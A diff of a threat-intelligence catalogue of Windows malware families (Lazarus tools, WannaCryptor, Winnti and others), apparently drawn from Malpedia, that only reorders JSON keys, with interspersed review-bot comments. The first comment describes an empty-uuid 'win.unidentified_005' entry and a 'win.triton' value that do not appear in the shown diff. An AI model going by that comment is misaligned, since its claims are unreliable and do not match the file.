"meta": {
- "synonyms": [],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_042",
"http://www.intezer.com/lazarus-group-targets-more-cryptocurrency-exchanges-and-fintech-companies/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
},
"uuid": "168bf2a1-45a5-41ac-b364-5740e7ce9757",
- "value": "Unidentified 042",
- "description": ""
+ "value": "Unidentified 042"
},
{
+ "description": "",
"meta": {
- "synonyms": [],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_044"
- ]
+ ],
+ "synonyms": [],
+ "type": []
},
"uuid": "df9c8440-b4da-4226-b982-e510d06cf246",
- "value": "Unidentified 044",
- "description": ""
+ "value": "Unidentified 044"
},
{
+ "description": "",
"meta": {
- "synonyms": [],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_045"
- ]
+ ],
+ "synonyms": [],
+ "type": []
},
"uuid": "4cb8235a-7e70-4fad-9244-69215750d559",
- "value": "Unidentified 045",
- "description": ""
+ "value": "Unidentified 045"
},
{
+ "description": "",
"meta": {
- "synonyms": [],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_046",
"https://twitter.com/DrunkBinary/status/1006534471687004160"
- ]
+ ],
+ "synonyms": [],
+ "type": []
},
"uuid": "878ab9fc-a526-43bd-81ac-3eba14ba0f1f",
- "value": "Unidentified 046",
- "description": ""
+ "value": "Unidentified 046"
},
{
+ "description": "RAT written in Delphi used by Patchwork APT.",
"meta": {
- "synonyms": [],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_047",
"https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
},
"uuid": "18da6a0e-abe9-4f65-91a3-2bf5a5ad29c2",
- "value": "Unidentified 047",
- "description": "RAT written in Delphi used by Patchwork APT."
+ "value": "Unidentified 047"
},
{
+ "description": "",
"meta": {
- "synonyms": [],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_048",
"https://twitter.com/DrunkBinary/status/1002587521073721346"
- ]
+ ],
+ "synonyms": [],
+ "type": []
},
"uuid": "3304c5ce-85f0-4648-b95f-33cf9621cd2f",
- "value": "Unidentified 048 (Lazarus?)",
- "description": ""
+ "value": "Unidentified 048 (Lazarus?)"
},
{
+ "description": "",
"meta": {
- "synonyms": [],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_049",
"https://www.welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
},
"uuid": "abd22cec-49ee-431f-a2e6-e4722b3e44bb",
- "value": "Unidentified 049 (Lazarus/RAT)",
- "description": ""
+ "value": "Unidentified 049 (Lazarus/RAT)"
},
{
+ "description": "",
"meta": {
- "synonyms": [],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_051",
"https://twitter.com/CDA/status/1014144988454772736"
- ]
+ ],
+ "synonyms": [],
+ "type": []
},
"uuid": "b614f291-dbf8-49ed-b110-b69ab6e8c6e5",
- "value": "Unidentified 051",
- "description": ""
+ "value": "Unidentified 051"
},
{
+ "description": "",
"meta": {
- "synonyms": [],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_052"
- ]
+ ],
+ "synonyms": [],
+ "type": []
},
"uuid": "80c12fcd-e5ef-4549-860d-7928363022f9",
- "value": "Unidentified 052",
- "description": ""
+ "value": "Unidentified 052"
},
{
+ "description": "",
"meta": {
- "synonyms": [],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_053",
"https://labsblog.f-secure.com/2015/11/24/wonknu-a-spy-for-the-3rd-asean-us-summit/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
},
"uuid": "b60e32bd-158a-42b9-ac21-288bca4c8233",
- "value": "Unidentified 053 (Wonknu?)",
- "description": ""
+ "value": "Unidentified 053 (Wonknu?)"
},
{
+ "description": "",
"meta": {
- "synonyms": [],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.unlock92",
"https://twitter.com/struppigel/status/810753660737073153",
"https://twitter.com/bartblaze/status/976188821078462465"
- ]
+ ],
+ "synonyms": [],
+ "type": []
},
"uuid": "036e657f-a752-4a4c-bb30-f15c24d954e6",
- "value": "Unlock92",
- "description": ""
+ "value": "Unlock92"
},
{
+ "description": "",
"meta": {
- "synonyms": [
- "Rombrast"
- ],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.upas",
"https://research.checkpoint.com/deep-dive-upas-kit-vs-kronos/",
"https://malware.dontneedcoffee.com/2012/08/inside-upas-kit1.0.1.1.html",
"https://twitter.com/ulexec/status/1005096227741020160"
- ]
+ ],
+ "synonyms": [
+ "Rombrast"
+ ],
+ "type": []
},
"uuid": "b64ea39b-3ec2-49e3-8992-02d71c21b1bd",
- "value": "UPAS",
- "description": ""
+ "value": "UPAS"
},
{
+ "description": "",
"meta": {
- "synonyms": [],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.upatre",
"https://johannesbader.ch/2015/06/Win32-Upatre-BI-Part-1-Unpacking/",
"https://researchcenter.paloaltonetworks.com/2018/07/unit42-upatre-continues-evolve-new-anti-analysis-techniques/",
"https://secrary.com/ReversingMalware/Upatre/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
},
"uuid": "925390a6-f88d-46dc-96ae-4ebc9f0b50b0",
- "value": "Upatre",
- "description": ""
+ "value": "Upatre"
},
{
+ "description": "",
"meta": {
- "synonyms": [],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.urausy"
- ]
+ ],
+ "synonyms": [],
+ "type": []
},
"uuid": "5af4838f-1b4d-4f0b-bd27-50ef532e84f7",
- "value": "Urausy",
- "description": ""
+ "value": "Urausy"
},
{
+ "description": "",
"meta": {
- "synonyms": [
- "Bebloh",
- "Shiotob"
- ],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.urlzone",
"https://www.gdatasoftware.com/blog/2013/12/23978-bebloh-a-well-known-banking-trojan-with-noteworthy-innovations",
@@ -14865,34 +14864,33 @@
"https://www.proofpoint.com/us/threat-insight/post/Vawtrak-UrlZone-Banking-Trojans-Target-Japan",
"https://www.arbornetworks.com/blog/asert/an-update-on-the-urlzone-banker/",
"https://krebsonsecurity.com/2011/07/trojan-tricks-victims-into-transfering-funds/"
- ]
+ ],
+ "synonyms": [
+ "Bebloh",
+ "Shiotob"
+ ],
+ "type": []
},
"uuid": "ed9f995b-1b41-4b83-a978-d956670fdfbe",
- "value": "UrlZone",
- "description": ""
+ "value": "UrlZone"
},
{
+ "description": "",
"meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.uroburos"
+ ],
"synonyms": [
"Snake"
],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.uroburos"
- ]
+ "type": []
},
"uuid": "d674ffd2-1f27-403b-8fe9-b4af6e303e5c",
- "value": "Uroburos",
- "description": ""
+ "value": "Uroburos"
},
{
+ "description": "",
"meta": {
- "synonyms": [
- "Catch",
- "grabnew",
- "NeverQuest"
- ],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.vawtrak",
"https://threatpost.com/pos-attacks-net-crooks-20-million-stolen-bank-cards/117595/",
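Review bot: The element whose only ref is `win.unidentified_005` keeps `"uuid": ""` and re-emits `+ "value": ""`, so the cluster entry has neither a stable identifier nor a display name; in this galaxy the uuid is what `related`/`dest-uuid` entries point at and what de-duplication keys on, and an empty uuid collides with any other blank one. Give it a freshly generated UUIDv4 (placeholder: `<NEW-UUIDV4>`) and `"value": "Unidentified 005"` in line with its neighbours, or drop the element until it can be filled in. Separately, `+ "value": "win.triton"` at the top of the hunk uses the Malpedia slug as the display name where every sibling uses a human-readable name; I would not assume that is intentional without checking whether anything already references that value.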
@@ -14900,190 +14898,190 @@
"http://thehackernews.com/2017/01/neverquest-fbi-hacker.html",
"https://info.phishlabs.com/blog/the-unrelenting-evolution-of-vawtrak",
"https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/"
- ]
+ ],
+ "synonyms": [
+ "Catch",
+ "grabnew",
+ "NeverQuest"
+ ],
+ "type": []
},
"uuid": "b662c253-5c87-4ae6-a30e-541db0845f67",
- "value": "Vawtrak",
- "description": ""
+ "value": "Vawtrak"
},
{
+ "description": "Ransomware that appears to require manually installation (believed to be via RDP). Encrypts files with .velso extension. ",
"meta": {
- "synonyms": [],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.velso",
"https://www.bleepingcomputer.com/news/security/the-velso-ransomware-being-manually-installed-by-attackers/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
},
"uuid": "5490d2c7-72db-42cf-a1a4-02be1b3ade5f",
- "value": "Velso Ransomware",
- "description": "Ransomware that appears to require manually installation (believed to be via RDP). Encrypts files with .velso extension. "
+ "value": "Velso Ransomware"
},
{
+ "description": "",
"meta": {
- "synonyms": [],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.venus_locker",
"https://twitter.com/JaromirHorejsi/status/813690129088937984"
- ]
+ ],
+ "synonyms": [],
+ "type": []
},
"uuid": "7a0137ad-df7a-4fae-8365-eb36cc7e60cd",
- "value": "Venus Locker",
- "description": ""
+ "value": "Venus Locker"
},
{
+ "description": "",
"meta": {
- "synonyms": [],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.vermin",
"https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/",
"https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
},
"uuid": "2d07a1bf-1d8d-4f1e-a02f-1a8ff5b76cd1",
- "value": "Vermin",
- "description": ""
+ "value": "Vermin"
},
{
+ "description": "Vflooder floods VirusTotal by infinitely submitting a copy of itself. Some variants apparently also try to flood Twitter. The impact on these services are negligible, but for researchers it can be a nuisance. Most versions are protectd by VMProtect.",
"meta": {
- "synonyms": [],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.vflooder",
"https://blog.malwarebytes.com/threat-analysis/2017/10/analyzing-malware-by-api-calls/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
},
"uuid": "044849d3-d0de-4f78-b67d-bfbe8dd3a255",
- "value": "Vflooder",
- "description": "Vflooder floods VirusTotal by infinitely submitting a copy of itself. Some variants apparently also try to flood Twitter. The impact on these services are negligible, but for researchers it can be a nuisance. Most versions are protectd by VMProtect."
+ "value": "Vflooder"
},
{
+ "description": "",
"meta": {
- "synonyms": [],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.virdetdoor",
"https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
- ]
+ ],
+ "synonyms": [],
+ "type": []
},
"uuid": "30161733-993f-4a1c-bcc5-7b4f1cd7d9e4",
- "value": "virdetdoor",
- "description": ""
+ "value": "virdetdoor"
},
{
+ "description": "",
"meta": {
- "synonyms": [],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.virut",
"https://www.theregister.co.uk/2018/01/10/taiwanese_police_malware/",
"https://blog.malwarebytes.com/threat-analysis/2018/03/blast-from-the-past-stowaway-virut-delivered-with-chinese-ddos-bot/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
},
"uuid": "2e99f27c-6791-4695-b88b-de4d4cbda8d6",
- "value": "Virut",
- "description": ""
+ "value": "Virut"
},
{
+ "description": "",
"meta": {
- "synonyms": [
- "VMzeus",
- "ZeusVM",
- "Zberp"
- ],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.vmzeus",
"https://blog.malwarebytes.com/threat-analysis/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/",
"https://securityintelligence.com/new-zberp-trojan-discovered-zeus-zbot-carberp/",
"https://asert.arbornetworks.com/wp-content/uploads/2015/08/ZeusVM_Bits_and_Pieces.pdf"
- ]
+ ],
+ "synonyms": [
+ "VMzeus",
+ "ZeusVM",
+ "Zberp"
+ ],
+ "type": []
},
"uuid": "c32740a4-db2c-4d71-80bd-7377185f4a6f",
- "value": "VM Zeus",
- "description": ""
+ "value": "VM Zeus"
},
{
+ "description": "",
"meta": {
- "synonyms": [],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.vobfus",
"http://contagiodump.blogspot.com/2012/12/nov-2012-worm-vobfus-samples.html",
"https://blog.trendmicro.com/trendlabs-security-intelligence/whats-the-fuss-with-worm_vobfus/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
},
"uuid": "60f7b1b9-c283-4395-909f-7b8b1731e840",
- "value": "Vobfus",
- "description": ""
+ "value": "Vobfus"
},
{
+ "description": "",
"meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.volgmer",
+ "https://www.us-cert.gov/ncas/alerts/TA17-318B"
+ ],
"synonyms": [
"FALLCHILL",
"Manuscrypt"
],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.volgmer",
- "https://www.us-cert.gov/ncas/alerts/TA17-318B"
- ]
+ "type": []
},
"uuid": "bbfd4fb4-3e5a-43bf-b4bb-eaf5ef4fb25f",
- "value": "Volgmer",
- "description": ""
+ "value": "Volgmer"
},
{
+ "description": "",
"meta": {
- "synonyms": [],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.vreikstadi",
"https://twitter.com/malware_traffic/status/821483557990318080"
- ]
+ ],
+ "synonyms": [],
+ "type": []
},
"uuid": "ab2a63f1-1afd-44e7-9cf4-c775dbee78f4",
- "value": "Vreikstadi",
- "description": ""
+ "value": "Vreikstadi"
},
{
+ "description": "",
"meta": {
- "synonyms": [],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.vskimmer",
"http://vkremez.weebly.com/cyber-security/-backdoor-win32hesetoxa-vskimmer-pos-malware-analysis",
"http://www.xylibox.com/2013/01/vskimmer.html",
"https://securingtomorrow.mcafee.com/mcafee-labs/vskimmer-botnet-targets-credit-card-payment-terminals/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
},
"uuid": "3eae1764-7ea6-43e6-85a1-b1dd0b4856b8",
- "value": "vSkimmer",
- "description": ""
+ "value": "vSkimmer"
},
{
+ "description": "",
"meta": {
- "synonyms": [],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.w32times",
"https://attack.mitre.org/wiki/Group/G0022"
- ]
+ ],
+ "synonyms": [],
+ "type": []
},
"uuid": "2479b6b9-c818-4f96-aba4-47ed7855e4a8",
- "value": "w32times",
- "description": ""
+ "value": "w32times"
},
{
+ "description": "",
"meta": {
- "synonyms": [
- "Wcry",
- "WannaCry",
- "Wana Decrypt0r"
- ],
- "type": [],
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.wannacryptor",
"https://themoscowtimes.com/news/wcry-virus-reportedly-infects-russian-interior-ministrys-computer-network-57984", 
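Review bot: The Velso description re-emitted as a `+` line near the top of this hunk carries a trailing space inside the string (`... .velso extension. "`) and the phrase `require manually installation`; trim the space and write `requires manual installation (believed to be via RDP)`. In the Vflooder description further down the same hunk, `The impact on these services are negligible` should read `is negligible` and `protectd` should be `protected`. Both strings are on new lines, so fixing them here costs nothing extra.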
@@ -15102,265 +15100,269 @@ "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group", "https://www.flashpoint-intel.com/blog/linguistic-analysis-wannacry-ransomware/", "http://www.independent.co.uk/news/uk/home-news/wannacry-malware-hack-nhs-report-cybercrime-north-korea-uk-ben-wallace-a8022491.html" - ] + ], + "synonyms": [ + "Wcry", + "WannaCry", + "Wana Decrypt0r" + ], + "type": [] }, "uuid": "ad67ff31-2a02-43f9-8b12-7df7e4fcccd6", - "value": "WannaCryptor", - "description": "" + "value": "WannaCryptor" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.waterminer", "https://blog.minerva-labs.com/waterminer-a-new-evasive-crypto-miner" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "d536931e-ad4f-485a-b93d-fe05f23a9367", - "value": "WaterMiner", - "description": "" + "value": "WaterMiner" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.waterspout", "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "d238262a-4832-408f-9926-a7174e671b50", - "value": "WaterSpout", - "description": "" + "value": "WaterSpout" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_adspace", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "e57c677f-0117-4e23-8c3f-a772ed809f4c", - "value": "WebC2-AdSpace", - "description": "" + "value": "WebC2-AdSpace" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_ausov", 
"https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "64f5ae85-1324-43de-ba3a-063785567be0", - "value": "WebC2-Ausov", - "description": "" + "value": "WebC2-Ausov" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_bolid", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "71292a08-9a7b-4df1-b1fd-7d80a8fcc18f", - "value": "WebC2-Bolid", - "description": "" + "value": "WebC2-Bolid" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_cson", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "5371bc44-dc07-4992-a3d7-c21705c50ac4", - "value": "WebC2-Cson", - "description": "" + "value": "WebC2-Cson" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_div", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "acdda3e5-e776-419b-b060-14f3406de061", - "value": "WebC2-DIV", - "description": "" + "value": "WebC2-DIV" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_greencat", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "cfed10ed-6601-469e-a1df-2d561b031244", - "value": "WebC2-GreenCat", - "description": "" + 
"value": "WebC2-GreenCat" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_head", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "f9f37707-36cf-4ad0-88e0-86f47cbe0ed6", - "value": "WebC2-Head", - "description": "" + "value": "WebC2-Head" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_kt3", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "15094548-7555-43ee-8c0d-4557d6d8a087", - "value": "WebC2-Kt3", - "description": "" + "value": "WebC2-Kt3" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_qbp", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "71d8ef43-3767-494b-afaa-f58aad70df65", - "value": "WebC2-Qbp", - "description": "" + "value": "WebC2-Qbp" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_rave", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "5350bf3a-26b0-49fb-a0b8-dd68933ea78c", - "value": "WebC2-Rave", - "description": "" + "value": "WebC2-Rave" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_table", 
"https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "1035ea6f-6743-4e69-861c-454c19ec96ae", - "value": "WebC2-Table", - "description": "" + "value": "WebC2-Table" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_ugx", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b459033c-2d19-49aa-a21f-44a01d1a4156", - "value": "WebC2-UGX", - "description": "" + "value": "WebC2-UGX" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_yahoo", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "52c1518d-175c-4b39-bc7c-353d2ddf382e", - "value": "WebC2-Yahoo", - "description": "" + "value": "WebC2-Yahoo" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webmonitor", "https://researchcenter.paloaltonetworks.com/2018/04/unit42-say-cheese-webmonitor-rat-comes-c2-service-c2aas/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "fa3d196b-b757-49b7-a06d-77c77ac151c4", - "value": "WebMonitor RAT", - "description": "" + "value": "WebMonitor RAT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wellmess", "https://blog.jpcert.or.jp/2018/07/malware-wellmes-9b78.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "d84ebd91-58f6-459f-96a1-d028a1719914", - "value": "WellMess", - "description": "" + "value": "WellMess" }, { + "description": "", "meta": { - "synonyms": [], - "type": 
[], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wildfire", "https://labs.opendns.com/2016/07/13/wildfire-ransomware-gaining-momentum/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "2f512a73-6847-4231-81c6-8b51af8b5be2", - "value": "WildFire", - "description": "" + "value": "WildFire" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.winmm", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf", "https://securelist.com/analysis/publications/69953/the-naikon-apt/", "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "6a100902-7204-4f20-b838-545ed86d4428", - "value": "WinMM", - "description": "" + "value": "WinMM" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.winnti", "http://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/", 
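Review bot: Every entry on the new side of this hunk that has no description carries `"description": ""` as its first key (first at the `+ "description": "",` line ahead of the WaterMiner `meta`), and the same pattern repeats in the hunks at -15369, -15488, -15595, -15735 and -15793. An empty string is a sentinel that consumers cannot tell apart from a deliberately empty description; if the galaxy schema does not require the key, omitting it is the cleaner representation, and since these entries look generated from Malpedia the fix presumably belongs in the generator rather than in this file. The commit only reorders keys, so this is pre-existing data rather than a regression, but it is the most visible style point on the new side.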
@@ -15369,117 +15371,114 @@ "https://github.com/TKCERT/winnti-nmap-script", "https://github.com/TKCERT/winnti-suricata-lua", "https://github.com/TKCERT/winnti-detector" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "7f8166e2-c7f4-4b48-a07b-681b61a8f2c1", - "value": "Winnti", - "description": "" + "value": "Winnti" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.winsloader", "http://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "db755407-4135-414c-90e3-97f5e48c6065", - "value": "Winsloader", - "description": "" + "value": "Winsloader" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wipbot", "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "6b6cf608-cc2c-40d7-8500-afca3e35e7e4", - "value": "Wipbot", - "description": "" + "value": "Wipbot" }, { + "description": "", "meta": { - "synonyms": [ - "Wimmie", - "Syndicasec" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wmighost", "https://secrary.com/ReversingMalware/WMIGhost/", "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" - ] + ], + "synonyms": [ + "Wimmie", + "Syndicasec" + ], + "type": [] }, "uuid": "892cb6c2-b96c-4f77-a9cf-4dd3d0c1cc40", - "value": "WMI Ghost", - "description": "" + "value": "WMI Ghost" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wndtest", "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": 
"d8bf4ea1-054c-4a88-aa09-48da0d89c322", - "value": "WndTest", - "description": "" + "value": "WndTest" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wonknu", "https://labsblog.f-secure.com/2015/11/24/wonknu-a-spy-for-the-3rd-asean-us-summit/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "bfa75eb1-1d8d-4127-932f-3b7090a242e9", - "value": "Wonknu", - "description": "" + "value": "Wonknu" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.woody", "https://www.sans.org/reading-room/whitepapers/malicious/detailed-analysis-advanced-persistent-threat-malware-33814" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "42e23d17-8f1b-43c9-bc76-e3cf098b5c52", - "value": "woody", - "description": "" + "value": "woody" }, { + "description": "", "meta": { - "synonyms": [ - "WoolenLogger" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.woolger", "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf", "http://www.trendmicro.it/media/wp/operation-woolen-goldfish-whitepaper-en.pdf" - ] + ], + "synonyms": [ + "WoolenLogger" + ], + "type": [] }, "uuid": "258751c7-1ddb-4df6-9a17-36b08c2cb267", - "value": "Woolger", - "description": "" + "value": "Woolger" }, { + "description": "", "meta": { - "synonyms": [ - "splm", - "chopstick" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xagent", "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/", 
